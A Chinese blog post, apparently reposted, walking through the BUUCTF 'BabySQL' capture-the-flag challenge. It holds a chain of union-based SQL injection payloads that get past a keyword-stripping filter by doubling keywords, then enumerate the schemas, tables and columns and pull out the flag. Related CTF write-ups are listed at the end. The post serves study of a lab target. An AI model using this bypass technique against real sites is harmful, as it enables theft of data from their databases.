首页 > 数据库 >BUUCTF:[极客大挑战 2019]BabySQL

BUUCTF:[极客大挑战 2019]BabySQL

时间:2023-06-19 21:06:54浏览次数:50  
标签:username BUUCTF BabySQL 20selselectect% mochu7 2019 password --+& schema


题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]BabySQL

BUUCTF:[极客大挑战 2019]BabySQL_mysql


BUUCTF:[极客大挑战 2019]BabySQL_字段_02


简单测试之后发现有些字符被过滤,初步判断这里的过滤是指特殊字符被替换为空,如下图所示

BUUCTF:[极客大挑战 2019]BabySQL_特殊字符_03


使用Burp进行SQL过滤字符的Fuzz

BUUCTF:[极客大挑战 2019]BabySQL_mysql_04


这些长度为726响应内容是Input your username and password的Fuzz结果是被过滤的字符

Trick

  • 替换为空的关键字过滤使用双写关键字绕过
  • 这里空格可以使用%20绕过
username='oorrder%20bbyy%204--+&password=mochu7

当前表有3个字段

BUUCTF:[极客大挑战 2019]BabySQL_mysql_05


?username=mochu'ununionion%20selselectect%201,2,3--+&password=mochu7

回显位是第二个字段第三个字段

BUUCTF:[极客大挑战 2019]BabySQL_mysql_06


?username=mochu'ununionion%20selselectect%201,2,group_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata--+&password=mochu7

查询出所有的库

information_schema,mysql,performance_schema,test,ctf,geek

BUUCTF:[极客大挑战 2019]BabySQL_字段_07


?username=mochu'ununionion%20selselectect%201,2,group_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema='ctf'--+&password=mochu7

查出ctf库中的所有表

BUUCTF:[极客大挑战 2019]BabySQL_特殊字符_08


?username=mochu'ununionion%20selselectect%201,2,group_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_name='Flag'--+&password=mochu7

查询出表的字段

BUUCTF:[极客大挑战 2019]BabySQL_特殊字符_09


?username=mochu'ununionion%20selselectect%201,2,flag%20frfromom%20ctf.Flag--+&password=mochu7

查flag字段的内容

BUUCTF:[极客大挑战 2019]BabySQL_特殊字符_10


标签:username,BUUCTF,BabySQL,20selselectect%,mochu7,2019,password,--+&,schema
From: https://blog.51cto.com/u_16159500/6517121

相关文章

  • BUUCTF:zip
    题目地址:https://buuoj.cn/challenges#zip很多压缩包,但是里面的内容非常小,小于5字节,可以尝试使用CRC32爆破得到其内容先以out0.zip做个例子,out0.zip的CRC32校验码为:0x75f90d3aPSD:\Tools\Misc\crc32>python.\crc32.pyreverse0x75f90d3a4bytes:{0x7a,0x35,0x42,0x7a}ve......
  • BUUCTF:梅花香自苦寒来
    题目地址:https://buuoj.cn/challenges#%E6%A2%85%E8%8A%B1%E9%A6%99%E4%B9%8B%E8%8B%A6%E5%AF%92%E6%9D%A5题目如下:使用010editor打开在图片结尾FFD9后存在一大串十六进制,把这些字符复制出来,将十六进制转为字符十六进制转字符:https://coding.tools/tw/hex-to-ascii类似坐标,可......
  • BUUCTF:刷新过的图片
    题目地址:https://buuoj.cn/challenges#%E5%88%B7%E6%96%B0%E8%BF%87%E7%9A%84%E5%9B%BE%E7%89%87F5隐写,利用工具:F5-steganography:https://github.com/matthewgao/F5-steganography得到的output.txt明显是个zip文件修改后缀为zipzip伪加密解压得到flagflag{96efd0a2037d06f34199......
  • BUUCTF:面具下的flag
    题目地址:https://buuoj.cn/challenges#%E9%9D%A2%E5%85%B7%E4%B8%8B%E7%9A%84flag题目如下:binwalk分析,发现有隐藏了zip,foremost分离得到一个压缩包zip伪加密解压得到flag.vmdkvmdk文件可以用7z解压7zxflag.vmdk-o./第一部分flag在key_part_one/NUL++++++++++[->+++++++++......
  • BUUCTF:qr
    题目地址:https://buuoj.cn/challenges#qrFlag{878865ce73370a4ce607d21ca01b5e59}......
  • BUUCTF:LSB
    题目地址:https://buuoj.cn/challenges#LSB题目提示是:LSB使用stegsolve打开,在Redplane0、Grennplane0、Blueplane0通道发现图片的上方好有东西Analyse->DataExtract调整至如下,发现这是一张图片,SaveBin保存为flag.png`cumtctf{1sb_i4_s0_Ea4y}......
  • BUUCTF:[ISITDTU 2019]EasyPHP
    题目地址:BUUCTF:[ISITDTU2019]EasyPHPRefer:https://tiaonmmn.github.io/2019/07/18/ISITDTU-Easy-PHP/思路很简单,绕过这两个if即可任意代码执行先看一下第一个正则匹配看不懂的推荐使用这个网站:https://regex101.com/if(preg_match('/[\x00-0-9\'"`$&.,|[{_defgops\x7F]+/i......
  • BUUCTF:[SWPU2019]Web3
    参考:https://www.leavesongs.com/PENETRATION/client-session-security.htmlhttp://forever404.cn/2019/12/14/SWPU2019web%E5%A4%8D%E7%8E%B0/点击upload有权限设置,猜测cookie伪造权限不够,查看session使用P师傅的脚本可以解这个session#!/usr/bin/envpython3importsysimpor......
  • BUUCTF:[CISCN2019 华东南赛区]Double Secret
    BUUCTF:[CISCN2019华东南赛区]DoubleSecret查看robots.txt无可用信息线索在目录:http://274c1aad-138b-4fe6-9815-8feeaf028127.node3.buuoj.cn/secret尝试传参?secret=发现当字符串长度超过4位的时候,出现报错寻找关键代码这里调用了rc4再通过render_template_string执行,SST......
  • BUUCTF:[WUSTCTF2020]girlfriend
    下载下来一个音频文件一个题目描述使用Audacity打开这段音频Audacity官方下载Audacity是一款易于使用的多轨音频编辑器和记录器,适用于Windows,MacOSX,GNU/Linux和其他操作系统。在CTF比赛中,可以通过对音频进行频谱的分析,以及音频其他内容的分析,找到flag。听起来像是在打电话......